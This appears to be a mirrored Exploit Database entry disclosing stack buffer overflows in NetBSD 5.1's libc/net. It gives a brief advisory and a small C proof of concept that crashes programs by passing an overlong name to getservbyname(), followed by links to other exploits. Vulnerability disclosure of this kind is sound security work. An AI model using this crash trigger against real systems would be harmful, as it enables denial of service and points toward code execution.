NetBSD 5.1 – ‘libc/net’ Multiple Stack Buffer Overflows

Exploit Database
110 阅读

作者： Maksymilian Arciemowicz

日期： 2011-07-01
类别：
- remote
平台：
- bsd
来源：https://www.exploit-db.com/exploits/35919/

// source: https://www.securityfocus.com/bid/48528/info

NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.

Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.

127# gcc -o grr grr.c && ./grr 6050

127# gcc -o grr grr.c && ./grr 6051

Memory fault (core dumped)

127#

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

int main(int argc, char *argv[]){

char *cycek;

cycek=malloc(atoi(argv[1]));

if(!cycek) return 1;

memset(cycek,'A',atoi(argv[1]));

getservbyname(cycek,"tcp");

return 0;

}

last Exploits
NetBSD 5.1 – ‘libc/net’ Multiple Stack Buffer Overflows的更多信息

Executables Created with perl2exe < V30.10C - Arbitrary Code Execution：
IBM Tivoli Storage Manager Express CAD Service – Remote Buffer Overflow (Metasploit) (1)：
CiscoWorks Common Services Framework 3.1.1 Help Servlet – Cross-Site Scripting：
U.S.Robotics USR5463 0.06 Firmware – ‘setup_ddns.exe’ HTML Injection：
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)：
WiFi Mouse 1.7.8.5 – Remote Code Execution：
iOS iDocManager 1.0.0 – Directory Traversal：
Adobe Flash Player – domainMemory ByteArray Use-After-Free (Metasploit)：